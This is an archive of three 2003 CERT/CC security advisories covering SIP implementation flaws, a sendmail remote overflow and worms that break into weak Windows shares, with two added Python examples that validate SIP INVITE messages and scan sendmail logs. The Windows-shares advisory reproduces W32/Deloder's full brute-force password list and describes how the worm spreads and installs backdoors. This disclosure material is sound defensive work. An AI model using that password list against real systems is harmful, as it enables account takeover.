Revision History February 19, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPlPkcmjtSoHZUTs5AQGFkAQAmTTDL3Tyn818VW59c0Ec5Tt+N78TKs8y h6Mnp4gkZuFLaPXju8zw1oNat4HoR7JWefBo7Lj6QFMf9HANlg7NexYmmQZSupL/ TZrFF6Nisfg/jQ7H6hPH/kajm/siJO6BuPgQIyEWtHkrJ6ce4jgcPGmuJsLzuUW3 N4QKY3gFD2A= =nkbt -----END PGP SIGNATURE----- From - Fri Feb 21 11:39:40 2003 X-UIDL: 3346 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink4.berkeley.edu (8.12.7/8.12.3) with ESMTP id h1LIvXAX347518; Fri, 21 Feb 2003 10:57:33 -0800 (PST) Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.11.6/8.11.6/1.14) with SMTP id h1LFPcR05853; Fri, 21 Feb 2003 10:25:38 -0500 Date: Fri, 21 Feb 2003 10:25:38 -0500 Message-Id: 
CERT Advisory CA-2003-06 Multiple vulnerabilities in implementations of the Session Initiation Protocol (SIP)

Original release date: February 21, 2003
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

SIP-enabled products from a wide variety of vendors are affected. Other systems making use of SIP may also be vulnerable but were not specifically tested. Not all SIP implementations are affected. See Vendor Information for details from vendors who have provided feedback for this advisory. In addition to the vendors who provided feedback for this advisory, a list of vendors whom CERT/CC contacted regarding these problems is available from VU#528719.

Overview

Numerous vulnerabilities have been reported in multiple vendors' implementations of the Session Initiation Protocol. These vulnerabilities may allow an attacker to gain unauthorized privileged access, cause denial-of-service attacks, or cause unstable system behavior. If your site uses SIP-enabled products in any capacity, the CERT/CC encourages you to read this advisory and follow the advice provided in the Solution section below.

I. Description

The Session Initiation Protocol (SIP) is a developing and newly deployed protocol that is commonly used in Voice over IP (VoIP), Internet telephony, instant messaging, and various other applications. SIP is a text-based protocol for initiating communication and data sessions between users.

The Oulu University Secure Programming Group (OUSPG) previously conducted research into vulnerabilities in LDAP, culminating in CERT Advisory CA-2001-18, and SNMP, resulting in CERT Advisory CA-2002-03. OUSPG's most recent research focused on a subset of SIP related to the INVITE message, which SIP agents and proxies are required to accept in order to set up sessions. By applying the PROTOS c07-sip test suite to a variety of popular SIP-enabled products, the OUSPG discovered impacts ranging from unexpected system behavior and denial of services to remote code execution. Note that "throttling" is an expected behavior.

Specifications for the Session Initiation Protocol are available in RFC3261:
http://www.ietf.org/rfc/rfc3261.txt

OUSPG has established the following site with detailed documentation regarding SIP and the implementation test results from the test suite:
http://www.ee.oulu.fi/research/ouspg/protos/testing/c07/sip/

The IETF Charter page for SIP is available at
http://www.ietf.org/html.charters/sip-charter.html

II. Impact

Exploitation of these vulnerabilities may result in denial-of-service conditions, service interruptions, and in some cases may allow an attacker to gain unauthorized access to the affected device. Specific impacts will vary from product to product.

III. Solution

Many of the mitigation steps recommended below may have significant impact on your everyday network operations and/or network architecture. Ensure that any changes made based on the following recommendations will not unacceptably affect your ongoing network operations capability.

Apply a patch from your vendor

Appendix A contains information provided by vendors for this advisory. Please consult this appendix and VU#528719 to determine if your product is vulnerable. If a statement is unavailable, you may need to contact your vendor directly.
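The Description above traces the failures to how implementations handle the INVITE message. As an added illustration (not code from the advisory, OUSPG or any vendor), the following Python shows the bounds and structure checks an implementation can apply to an INVITE before handing it to a full parser, so that an oversized or malformed request is rejected rather than processed; the size ceilings and the sample messages are constructed for this example.

```python
import re

# Size ceilings are assumptions chosen for this example; RFC 3261 sets none.
MAX_MESSAGE_BYTES = 8192
MAX_HEADER_LINE_BYTES = 1024
MAX_HEADERS = 64
MAX_BODY_BYTES = 4096

# RFC 3261 section 8.1.1: header fields every request must carry.
REQUIRED = ("to", "from", "cseq", "call-id", "max-forwards", "via")
# Fields that must not repeat (Via may, one per hop).
SINGLE_VALUED = ("to", "from", "cseq", "call-id", "max-forwards", "content-length")
# RFC 3261 section 7.3.3 compact forms for the fields checked here.
COMPACT = {"t": "to", "f": "from", "i": "call-id", "v": "via", "l": "content-length"}

REQUEST_LINE = re.compile(r"^([A-Z]+) (sips?:\S+) SIP/2\.0$")
HEADER_NAME = re.compile(r"^[a-z0-9.!%*_+`'~-]+$")
CSEQ = re.compile(r"^[0-9]{1,10} ([A-Z]+)$")
SMALL_INT = re.compile(r"^[0-9]{1,7}$")


def parse_headers(lines):
    """Return (headers, reason); headers maps lowercase name -> list of values.
    Folded continuation lines (leading SP/HTAB) are joined to the previous field."""
    headers = {}
    last = None
    count = 0
    for line in lines:
        if len(line.encode("utf-8")) > MAX_HEADER_LINE_BYTES:
            return None, "header line too long"
        if line[:1] in (" ", "\t"):
            if last is None:
                return None, "folded line with no preceding header"
            headers[last][-1] += " " + line.strip()
            continue
        name, colon, value = line.partition(":")
        name = COMPACT.get(name.strip().lower(), name.strip().lower())
        if not colon or not HEADER_NAME.match(name):
            return None, "malformed header line"
        count += 1
        if count > MAX_HEADERS:
            return None, "too many headers"
        headers.setdefault(name, []).append(value.strip())
        last = name
    return headers, ""


def validate_invite(raw):
    """Return (ok, reason); ok is True only for a bounded, well-formed INVITE."""
    if len(raw) > MAX_MESSAGE_BYTES:
        return False, "message too large"
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return False, "not valid UTF-8"
    head, sep, body = text.partition("\r\n\r\n")
    if not sep:
        return False, "no end of headers"
    lines = head.split("\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        return False, "bad request line"
    if m.group(1) != "INVITE":
        return False, "not an INVITE"
    headers, reason = parse_headers(lines[1:])
    if headers is None:
        return False, reason
    for name in REQUIRED:
        if name not in headers:
            return False, "missing required header: " + name
    for name in SINGLE_VALUED:
        if len(headers.get(name, [])) > 1:
            return False, "duplicate header: " + name
    cs = CSEQ.match(headers["cseq"][0])
    if not cs or cs.group(1) != "INVITE":
        return False, "bad CSeq"
    mf = headers["max-forwards"][0]
    if not SMALL_INT.match(mf) or int(mf) > 255:
        return False, "bad Max-Forwards"
    body_len = len(body.encode("utf-8"))
    if "content-length" in headers:
        cl = headers["content-length"][0]
        if not SMALL_INT.match(cl) or int(cl) != body_len:
            return False, "bad Content-Length"
    if body_len > MAX_BODY_BYTES:
        return False, "body too large"
    return True, "ok"


# Constructed sample messages (not PROTOS test cases); 192.0.2.0/24 is documentation space.
GOOD_INVITE = (
    b"INVITE sip:bob@example.com SIP/2.0\r\n"
    b"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds\r\n"
    b"Max-Forwards: 70\r\n"
    b"To: Bob <sip:bob@example.com>\r\n"
    b"From: Alice <sip:alice@example.com>;tag=1928301774\r\n"
    b"Call-ID: a84b4c76e66710@192.0.2.10\r\n"
    b"CSeq: 314159 INVITE\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)
OVERLONG_VIA = GOOD_INVITE.replace(b"z9hG4bK776asdhds", b"z9hG4bK" + b"A" * 1500)
HUGE_LENGTH = GOOD_INVITE.replace(b"Content-Length: 0", b"Content-Length: 4294967295")
NO_CALL_ID = GOOD_INVITE.replace(b"Call-ID: a84b4c76e66710@192.0.2.10\r\n", b"")

if __name__ == "__main__":
    for label, msg in [("good", GOOD_INVITE), ("overlong Via", OVERLONG_VIA),
                       ("huge Content-Length", HUGE_LENGTH), ("no Call-ID", NO_CALL_ID)]:
        print(label, validate_invite(msg))
```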
Disable the SIP-enabled devices and services

As a general rule, the CERT/CC recommends disabling any service or capability that is not explicitly required. Some of the affected products may rely on SIP to be functional. You should carefully consider the impact of blocking services that you may be using.

Ingress filtering

As a temporary measure, it may be possible to limit the scope of these vulnerabilities by blocking access to SIP devices and services at the network perimeter. Ingress filtering manages the flow of traffic as it enters a network under your administrative control. Servers are typically the only machines that need to accept inbound traffic from the public Internet. Note that most SIP User Agents (including IP phones or "client" software) consist of a User Agent Client and a User Agent Server. In the network usage policy of many sites, there are few reasons for external hosts to initiate inbound traffic to machines that provide no public services. Thus, ingress filtering should be performed at the border to prohibit externally initiated inbound traffic to non-authorized services.

For SIP, ingress filtering of the following ports can prevent attackers outside of your network from accessing vulnerable devices in the local network that are not explicitly authorized to provide public SIP services:

   sip     5060/udp    # Session Initiation Protocol (SIP)
   sip     5060/tcp    # Session Initiation Protocol (SIP)
   sip     5061/tcp    # Session Initiation Protocol (SIP) over TLS

Careful consideration should be given to addresses of the types mentioned above by sites planning for packet filtering as part of their mitigation strategy for these vulnerabilities. Please note that this workaround may not protect vulnerable devices from internal attacks.

Egress filtering

Egress filtering manages the flow of traffic as it leaves a network under your administrative control. There is typically limited need for machines providing public services to initiate outbound traffic to the Internet.

In the case of the SIP vulnerabilities, employing egress filtering on the ports listed above at your network border may prevent your network from being used as a source for attacks on other sites.

Block SIP requests directed to broadcast addresses at your router.

Since SIP requests can be transmitted via UDP, broadcast attacks are possible. One solution to prevent your site from being used as an intermediary in an attack is to block SIP requests directed to broadcast addresses at your router.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

America Online Inc

   Not vulnerable.

Apple Computer Inc.

   There are currently no applications shipped by Apple with Mac OS X or Mac OS X Server which make use of the Session Initiation Protocol.

Borderware

   No BorderWare products make use of SIP and thus no BorderWare products are affected by this vulnerability.

Clavister

   No Clavister products currently incorporate support for the SIP protocol suite, and as such, are not vulnerable.

   We would however like to extend our thanks to the OUSPG for their work as well as for the responsible manner in which they handle their discoveries. Their detailed reports and test suites are certainly well-received.

   We would also like to reiterate the fact that SIP has yet to mature, protocol-wise as well as implementation-wise. We do not recommend that our customers set up SIP relays in parallel to our firewall products to pass SIP-based applications in or out of networks where security is a concern of note.

F5 Networks

   F5 Networks does not have a SIP server product, and is therefore not affected by this vulnerability.

Fujitsu

   With regards to VU#528719, Fujitsu's UXP/V o.s. is not vulnerable because the relevant function is not supported under UXP/V.

IBM

   SIP is not implemented as part of the AIX operating system.

IP Filter

   IPFilter does not do any SIP specific protocol handling and is therefore not affected by the issues mentioned in the paper cited.

IPTel

   All versions of SIP Express Router up to 0.8.9 are sadly vulnerable to the OUSPG test suite. We strongly advise upgrading to version 0.8.10. Please also apply the patch to version 0.8.10 from http://www.iptel.org/ser/security/ before installation and keep on watching this site in the future. We apologize to our users for the trouble.

Hewlett-Packard Company

   Source: Hewlett-Packard Company Software Security Response Team
   cross reference id: SSRT2402

   HP-UX - not vulnerable
   HP-MPE/ix - not vulnerable
   HP Tru64 UNIX - not vulnerable
   HP OpenVMS - not vulnerable
   HP NonStop Servers - not vulnerable

   To report potential security vulnerabilities in HP software, send an E-mail message to: mailto:security-alert@hp.com

Lucent

   No Lucent products are known to be affected by this vulnerability, however we are still researching the issue and will update this statement as needed.

Microsoft Corporation

   Microsoft has investigated these issues. The Microsoft SIP client implementation is not affected.

NEC Corporation

   ===================================================================
   NEC vendor statement for VU#528719
   ===================================================================
   sent on February 13, 2002

   Server Products
   * EWS/UP 48 Series operating system
     - is NOT vulnerable, because it does not support SIP.

   Router Products
   * IX 1000 / 2000 / 5000 Series
     - is NOT vulnerable, because it does not support SIP.

   Other Network products
   * We continue to check our products which support SIP protocol.
   ===================================================================

NETBSD

   NetBSD does not ship any implementation of SIP.

NETfilter.org

   As the linux 2.4/2.5 netfilter implementation currently doesn't support connection tracking or NAT for the SIP protocol suite, we are not vulnerable to this bug.

NetScreen

   NetScreen is not vulnerable to this issue.

Network Appliance

   NetApp products are not affected by this vulnerability.

Nokia

   Nokia IP Security Platforms based on IPSO, Nokia Small Office Solution platforms, Nokia VPN products and Nokia Message Protector platform do not initiate or terminate SIP based sessions. The mentioned Nokia products are not susceptible to this vulnerability.

Nortel Networks

   Nortel Networks is cooperating to the fullest extent with the CERT Coordination Center. All Nortel Networks products that use Session Initiation Protocol (SIP) have been tested and all generally available products, with the following exceptions, have passed the test suite: Succession Communication Server 2000 and Succession Communication Server 2000 - Compact are impacted by the test suite only in configurations where SIP-T has been provisioned within the Communication Server; a software patch is expected to be available by the end of February.

   For further information about Nortel Networks products please contact Nortel Networks Global Network Support.
   North America: 1-800-4-NORTEL, or (1-800-466-7835)
   Europe, Middle East & Africa: 00800 8008 9009, or +44 (0) 870 907 9009
   Contacts for other regions available at the Global Contact web page.

Novell

   Novell has no products implementing SIP.

Secure Computing Corporation

   Neither Sidewinder nor Gauntlet implements SIP, so we do not need to be on the vendor list for this vulnerability.

SecureWorx

   We hereby attest that SecureWorx Basilisk Gateway Security product suite (Firmware version 3.4.2 or later) is NOT VULNERABLE to the Session Initiation Protocol (SIP) Vulnerability VU#528719 as described in the OUSPG announcement (OUSPG#0106) received on Fri, 8 Nov 2002 10:17:11 -0500.
Stonesoft

   Stonesoft's StoneGate high availability firewall and VPN product does not contain any code that handles SIP protocol. No versions of StoneGate are vulnerable.

Symantec

   Symantec Corporation products are not vulnerable to this issue. Symantec does not implement the Session Initiation Protocol (SIP) in any of our products.

Xerox

   Xerox is aware of this vulnerability and is currently assessing all products. This statement will be updated as new information becomes available.

Appendix B. - References

   1. http://www.ee.oulu.fi/research/ouspg/protos/
   2. http://www.kb.cert.org/vuls/id/528719
   3. http://www.cert.org/tech_tips/denial_of_service.html
   4. http://www.ietf.org/html.charters/sip-charter.html
   5. RFC3261 - SIP: Session Initiation Protocol
   6. RFC2327 - SDP: Session Description Protocol
   7. RFC2279 - UTF-8, a transformation format of ISO 10646
   8. Session Initiation Protocol Basic Call Flow Examples
   9. Session Initiation Protocol Torture Test Messages, Draft
_________________________________________________________________

The CERT Coordination Center thanks the Oulu University Secure Programming Group for reporting these vulnerabilities to us, for providing detailed technical analysis, and for assisting us in preparing this advisory. We would also like to acknowledge the "RedSkins" project of "MediaTeam Oulu" for their support of this research.
_________________________________________________________________

Feedback on this document can be directed to the authors, Jason A. Rafail and Ian A. Finlay.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-06.html
______________________________________________________________________

Copyright 2003 Carnegie Mellon University.

Revision History

Feb 21, 2003: Initial release
CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail

Original release date: March 3, 2003
Last revised: --
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

   * Sendmail Pro (all versions)
   * Sendmail Switch 2.1 prior to 2.1.5
   * Sendmail Switch 2.2 prior to 2.2.5
   * Sendmail Switch 3.0 prior to 3.0.3
   * Sendmail for NT 2.X prior to 2.6.2
   * Sendmail for NT 3.0 prior to 3.0.3
   * Systems running open-source sendmail versions prior to 8.12.8, including UNIX and Linux systems

Overview

There is a vulnerability in sendmail that may allow remote attackers to gain the privileges of the sendmail daemon, typically root.

I. Description

Researchers at Internet Security Systems (ISS) have discovered a remotely exploitable vulnerability in sendmail. This vulnerability could allow an intruder to gain control of a vulnerable sendmail server.

Most organizations have a variety of mail transfer agents (MTAs) at various locations within their network, with at least one exposed to the Internet. Since sendmail is the most popular MTA, most medium-sized to large organizations are likely to have at least one vulnerable sendmail server. In addition, many UNIX and Linux workstations provide a sendmail implementation that is enabled and running by default.

This vulnerability is message-oriented as opposed to connection-oriented. That means that the vulnerability is triggered by the contents of a specially-crafted email message rather than by lower-level network traffic. This is important because an MTA that does not contain the vulnerability will pass the malicious message along to other MTAs that may be protected at the network level. In other words, vulnerable sendmail servers on the interior of a network are still at risk, even if the site's border MTA uses software other than sendmail. Also, messages capable of exploiting this vulnerability may pass undetected through many common packet filters or firewalls.

Sendmail has indicated to the CERT/CC that this vulnerability has been successfully exploited in a laboratory environment. We do not believe that this exploit is available to the public. However, this vulnerability is likely to draw significant attention from the intruder community, so the probability of a public exploit is high.

A successful attack against an unpatched sendmail system will not leave any messages in the system log. However, on a patched system, an attempt to exploit this vulnerability will leave the following log message:

   Dropped invalid comments from header address

Although this does not represent conclusive evidence of an attack, it may be useful as an indicator. A patched sendmail server will drop invalid headers, thus preventing downstream servers from receiving them.

The CERT/CC is tracking this issue as VU#398025. This reference number corresponds to CVE candidate CAN-2002-1337.

For more information, please see
   http://www.sendmail.org
   http://www.sendmail.org/8.12.8.html
   http://www.sendmail.com/security/
   http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
   http://www.kb.cert.org/vuls/id/398025

II. Impact

Successful exploitation of this vulnerability may allow an attacker to gain the privileges of the sendmail daemon, typically root. Even vulnerable sendmail servers on the interior of a given network may be at risk since the vulnerability is triggered from the contents of a malicious email message.

III. Solution

Apply a patch from Sendmail

Sendmail has produced patches for versions 8.9, 8.10, 8.11, and 8.12. However, the vulnerability also exists in earlier versions of the code; therefore, site administrators using an earlier version are encouraged to upgrade to 8.12.8. These patches are located at
   ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.12.security.cr.patch
   ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.11.6.security.cr.patch
   ftp://ftp.sendmail.org/pub/sendmail/sendmail.8.9.3.security.cr.patch

Apply a patch from your vendor

Many vendors include vulnerable sendmail servers as part of their software distributions. We have notified vendors of this vulnerability and recorded their responses in the systems affected section of VU#398025. Several vendors have provided a statement for direct inclusion in this advisory; these statements are available in Appendix A.

Enable the RunAsUser option

There is no known workaround for this vulnerability. Until a patch can be applied, you may wish to set the RunAsUser option to reduce the impact of this vulnerability. As a good general practice, the CERT/CC recommends limiting the privileges of an application or service whenever possible.

Appendix A. - Vendor Information

This appendix contains information provided by vendors for this advisory. As vendors report new information to the CERT/CC, we will update this section and note the changes in our revision history. If a particular vendor is not listed below, we have not received their comments.

Apple Computer, Inc.

   Security Update 2003-03-03 is available to fix this issue. Packages are available for Mac OS X 10.1.5 and Mac OS X 10.2.4. It should be noted that sendmail is not enabled by default on Mac OS X, so only those systems which have explicitly enabled it are susceptible to the vulnerability. All customers of Mac OS X, however, are encouraged to apply this update to their systems.

Avaya, Inc.

   Avaya is aware of the vulnerability and is investigating impact. As new information is available this statement will be updated.

BSD/OS

   Wind River Systems has created patches for this problem which are available from the normal locations for each release. The relevant patches are M500-006 for BSD/OS version 5.0 or the Wind River Platform for Server Appliances 1.0, M431-002 for BSD/OS 4.3.1, or M420-032 for BSD/OS 4.2 systems.

Cisco Systems

   Cisco is investigating this issue. If we determine any of our products are vulnerable that information will be available at:
   http://www.cisco.com/go/psirt

Cray Inc.

   The code supplied by Cray, Inc. in Unicos, Unicos/mk, and Unicos/mp may be vulnerable. Cray has opened SPRs 724749 and 724750 to investigate. Cray, Inc. is not vulnerable for the MTA systems.

Hewlett-Packard Company

   SOURCE: Hewlett-Packard Company
   HP Services Software Security Response Team
   x-ref: SSRT3469 sendmail

   HP will provide notice of the availability of patches through standard security bulletin announcements and be available from your normal HP Services support channel.

IBM Corporation

   The AIX operating system is vulnerable to the sendmail issues discussed in releases 4.3.3, 5.1.0 and 5.2.0. A temporary patch is available through an efix package which can be found at
   ftp://ftp.software.ibm.com/aix/efixes/security/sendmail_efix.tar.Z

   IBM will provide the following official fixes:
   APAR number for AIX 4.3.3: IY40500 (available approx. 03/12/2003)
   APAR number for AIX 5.1.0: IY40501 (available approx. 04/28/2003)
   APAR number for AIX 5.2.0: IY40502 (available approx. 04/28/2003)

Openwall GNU/*/Linux

   Openwall GNU/*/Linux is not vulnerable. We use Postfix as the MTA, not sendmail.

Red Hat Inc.

   Updated sendmail packages that are not vulnerable to this issue are available for Red Hat Linux, Red Hat Advanced Server, and Red Hat Advanced Workstation. Red Hat Network users can update their systems using the 'up2date' tool.

   Red Hat Linux:
   http://rhn.redhat.com/errata/RHSA-2003-073.html

   Red Hat Linux Advanced Server, Advanced Workstation:
   http://rhn.redhat.com/errata/RHSA-2003-074.html

SGI

   SGI acknowledges VU#398025 reported by CERT and has released an advisory to address the vulnerability on IRIX. Refer to SGI Security Advisory 20030301-01-P available from ftp://patches.sgi.com/support/free/security/advisories/20030301-01-P or http://www.sgi.com/support/security/.

The Sendmail Consortium

   The Sendmail Consortium suggests that sites upgrade to 8.12.8 if possible. Alternatively, patches are available for 8.9, 8.10, 8.11, and 8.12 on http://www.sendmail.org/

Sendmail, Inc.

   All commercial releases including Sendmail Switch, Sendmail Advanced Message Server (which includes the Sendmail Switch MTA), Sendmail for NT, and Sendmail Pro are affected by this issue. Patch information is available at http://www.sendmail.com/security.
_________________________________________________________________

Our thanks to Internet Security Systems, Inc. for discovering this problem, and to Eric Allman, Claus Assmann, and Greg Shapiro of Sendmail for notifying us of this problem. We thank both groups for their assistance in coordinating the response to this problem.
_________________________________________________________________

Authors: Jeffrey P. Lanza and Shawn V. Hernan
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-2003-07.html
______________________________________________________________________

Copyright 2003 Carnegie Mellon University.
Revision History

Mar 03, 2003: Initial release
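Section I of CA-2003-07 above names one log line a patched server emits when it strips a header that would have triggered the overflow. As an added example (not from the advisory or from Sendmail), the Python below pulls that indicator out of syslog lines and joins each hit to the from=/relay= envelope line of the same queue id, so an analyst sees which relay delivered each message; the syslog layout is assumed and the sample lines, hosts and queue ids are constructed.

```python
import re
from collections import Counter

# The indicator quoted in CA-2003-07 for a patched server.
INDICATOR = "Dropped invalid comments from header address"

# Assumed syslog layout: "<Mon dd HH:MM:SS> <host> sendmail[<pid>]: <queue-id>: <text>"
LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} {1,2}\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) "
    r"sendmail\[\d+\]: (?P<qid>[A-Za-z0-9]+): (?P<text>.*)$"
)
SENDER = re.compile(r"from=<(?P<sender>[^>]*)>")
RELAY = re.compile(r"relay=(?P<relay>[^,]+)")


def find_dropped_header_events(lines):
    """Correlate indicator lines with the from=/relay= envelope line of the
    same queue id, whatever order the lines arrive in. Returns one dict per hit."""
    envelope = {}   # queue id -> (sender, relay)
    hits = []       # (timestamp, host, queue id)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a sendmail line in the assumed layout
        text = m.group("text")
        if text.startswith("from="):
            s = SENDER.search(text)
            r = RELAY.search(text)
            envelope[m.group("qid")] = (s.group("sender") if s else "",
                                        r.group("relay").strip() if r else "")
        elif INDICATOR in text:
            hits.append((m.group("ts"), m.group("host"), m.group("qid")))
    events = []
    for ts, host, qid in hits:
        sender, relay = envelope.get(qid, ("", ""))
        events.append({"ts": ts, "host": host, "qid": qid,
                       "sender": sender, "relay": relay})
    return events


def relay_counts(events):
    """Hits per delivering relay. A hit is a lead, not proof of an attack,
    as the advisory itself notes; a relay with many hits is worth a closer look."""
    return Counter(e["relay"] for e in events)


# Constructed sample lines; hosts, queue ids and addresses are invented.
# The second message's indicator line is deliberately logged before its from= line.
SAMPLE_LOG = """\
Mar  3 13:07:52 mx1 sendmail[8671]: h23I7qA00001: from=<alice@example.com>, size=1024, class=0, nrcpts=1, relay=relay.example.net [192.0.2.5]
Mar  3 13:07:52 mx1 sendmail[8671]: h23I7qA00001: Dropped invalid comments from header address
Mar  3 13:07:53 mx1 sendmail[8672]: h23I7qA00001: to=<bob@example.com>, delay=00:00:01, mailer=local, stat=Sent
Mar  3 13:09:10 mx1 sendmail[8702]: h23I9AA00002: Dropped invalid comments from header address
Mar  3 13:09:10 mx1 sendmail[8702]: h23I9AA00002: from=<carol@example.org>, size=2048, class=0, nrcpts=1, relay=[198.51.100.7]
Mar  3 13:12:00 mx1 sendmail[8744]: h23IC0A00003: from=<dave@example.com>, size=512, class=0, nrcpts=1, relay=relay.example.net [192.0.2.5]
Mar  3 13:12:01 mx1 sendmail[8744]: h23IC0A00003: to=<erin@example.com>, delay=00:00:01, mailer=local, stat=Sent
Mar  3 13:12:05 mx1 sshd[900]: Accepted publickey for ops from 192.0.2.9 port 50000 ssh2
"""

if __name__ == "__main__":
    found = find_dropped_header_events(SAMPLE_LOG.splitlines())
    for e in found:
        print(f'{e["ts"]} {e["host"]} {e["qid"]} sender={e["sender"]} relay={e["relay"]}')
    print(relay_counts(found))
```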
From: CERT Advisory
To: cert-advisory@cert.org
Organization: CERT(R) Coordination Center - +1 412-268-7090
Subject: CERT Advisory CA-2003-08 Increased Activity Targeting Windows Shares

CERT Advisory CA-2003-08 Increased Activity Targeting Windows Shares

Original release date: March 11, 2003
Source: CERT/CC

A complete revision history can be found at the end of this file.

Systems Affected

* Microsoft Windows 2000
* Microsoft Windows XP

Overview

In recent weeks, the CERT/CC has observed an increase in the number of reports of systems running Windows 2000 and XP compromised due to poorly protected file shares.

I. Description

Over the past few weeks, the CERT/CC has received an increasing number of reports of intruder activity involving the exploitation of Null (i.e., non-existent) or weak Administrator passwords on Server Message Block (SMB) file shares used on systems running Windows 2000 or Windows XP. This activity has resulted in the successful compromise of thousands of systems, with home broadband users' systems being a prime target. Recent examples of such activity are the attack tools known as W32/Deloder, GT-bot, sdbot, and W32/Slackor, which are described in more detail below.

Background

Microsoft Windows uses the SMB protocol to share files and printer resources with other computers. In older versions of Windows (e.g., 95, 98, Me, and NT), SMB shares ran on NetBIOS over TCP/IP (NBT) on ports 137/tcp and udp, 138/udp, and 139/tcp. However, in later versions of Windows (e.g., 2000 and XP), it is possible to run SMB directly over TCP/IP on port 445/tcp.
Windows file shares with poorly chosen or Null passwords have been a recurring security risk for both corporate networks and home users for some time:

* IN-2002-06: W32/Lioten Malicious Code
* CA-2001-20: Continuing Threats to Home Users
* IN-2000-02: Exploitation of Unprotected Windows Networking Shares
* IN-2000-03: 911 Worm

It has often been the case that these poorly configured shares were exposed to the Internet. Intruders have been able to leverage poorly protected Windows shares by exploiting weak or Null passwords to access user-created and default administrative shares.

This problem is exacerbated by another relevant trend: intruders specifically targeting Internet address ranges known to contain a high density of weakly protected systems. As described in CA-2001-20, the intruders' efforts commonly focus on addresses known to be used by home broadband connections.

Recent developments

The CERT/CC has recently received a number of reports of exploitation of Null or weak Administrator passwords on systems running Windows 2000 or Windows XP. Thousands of systems have been compromised in this manner. Although the tools involved in these reports vary, they exhibit a number of common traits, including

* scanning for systems listening on 445/tcp (frequently within the same /16 network as the infected host)
* exploiting Null or weak passwords to gain access to the Administrator account
* opening backdoors for remote access
* connecting back to Internet Relay Chat (IRC) servers to await additional commands from attackers
* installing or supporting tools for use in distributed denial-of-service (DDoS) attacks

Some of the tools reported have self-propagating (i.e., worm) capabilities, while others are propagated via social engineering techniques similar to those described in IN-2002-03: Social Engineering Attacks via IRC and Instant Messaging.
The network scanning associated with this activity is widespread but appears to be especially concentrated in address ranges commonly associated with home broadband users. Using these techniques, many attackers have built sizable networks of DDoS agents, each comprised of thousands of compromised systems.

W32/Deloder

The self-propagating W32/Deloder malicious code is an example of the intruder activity described above. It begins by scanning the /16 (i.e., addresses with the same first two high-order octets) of the infected host for systems listening on 445/tcp. When a connection is established, W32/Deloder attempts to compromise the Administrator account by using a list of pre-loaded passwords. Variants may include different or additional passwords, but reports to the CERT/CC indicate that the following have appeared thus far:

   [NULL] 0 000000 00000000 007 1 110 111 111111 11111111 12 121212 123
   123123 1234 12345 123456 1234567 12345678 123456789 1234qwer 123abc
   123asd 123qwe 2002 2003 2600 54321 654321 88888888 Admin Internet
   Login Password a aaa abc abc123 abcd admin admin123 administrator
   alpha asdf computer database enable foobar god godblessyou home
   ihavenopass login love mypass mypass123 mypc mypc123 oracle owner
   pass passwd password pat patrick pc pw pw123 pwd qwer root secret
   server sex super sybase temp temp123 test test123 win xp xxx
   xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx yxcv zxcv

On successful compromise of the Administrator account, W32/Deloder copies itself to the victim, placing multiple copies in various locations on the system. Additionally, it adds a registry key that will cause the automatic execution of dvldr32.exe (one of the aforementioned copies). The victim will begin scanning for other systems to infect after it is restarted.

W32/Deloder opens up backdoors on the victim system to allow attackers further access. It does this in two ways:

1. attempting to connect to one of a number of pre-configured IRC servers
2. installing a copy of VNC (Virtual Network Computing), an open-source remote display tool from AT&T, listening on 5800/tcp or 5900/tcp

Note: VNC in and of itself is not a malicious tool, and has many other legitimate uses.

During the course of infection by W32/Deloder, a number of files may be created on the system. Reports indicate that files matching the following descriptions have been found on compromised systems:

   Filename            File Size (bytes)   Description
   dvldr32.exe         745,984             The self-propagating malicious code
   inst.exe            684,562             This file installs the backdoor applications onto the victim host
   psexec.exe          36,352              A copy of the Remote Process Launch application (not inherently malicious, but it is what allows the worm to replicate)
   explorer.exe        212,992             A renamed copy of the VNC application
   omnithread_rt.dll   57,344              VNC dependency file
   VNCHooks.dll        32,768              VNC dependency file
   rundll32.exe        29,336              The IRC-Pitchfork bot application
   cygwin1.dll         944,968             IRC-Pitchfork dependency file

GT-bot and sdbot

Intruders frequently use IRC "bots" (automated software that accepts commands via IRC channels) to remotely control compromised systems. GT-bot and sdbot are two examples of intruder-developed IRC bots. Both support automated scanning and exploitation of inadequately protected Windows shares. These tools also offer intruders a variety of DDoS capabilities, including the ability to generate ICMP, UDP, or TCP traffic.

Tools like these are undergoing constant development in the intruder community and are frequently included as part of other tools. As a result, the names, sizes, and other characteristics of the files that might contain these tools vary widely. Furthermore, once installed, the tools are designed to hide themselves fairly well, so detection may be difficult.

The CERT/CC has received reports of sdbot networks as large as 7,000 systems, and GT-bot networks in excess of 140,000 systems.

W32/Slackor

The W32/Slackor worm is another example of a tool that targets file shares.
On a compromised machine, the worm begins by scanning the /16 of the infected host for other systems listening on 445/tcp. When a system is discovered, W32/Slackor connects to the IPC$ share using a set of pre-programmed usernames and passwords, copies itself to the C:\sp directory, and runs its payload. The payload consists of the following files:

   Filename          Description
   slacke-worm.exe   The self-propagating malicious code
   abc.bat           List of usernames/passwords
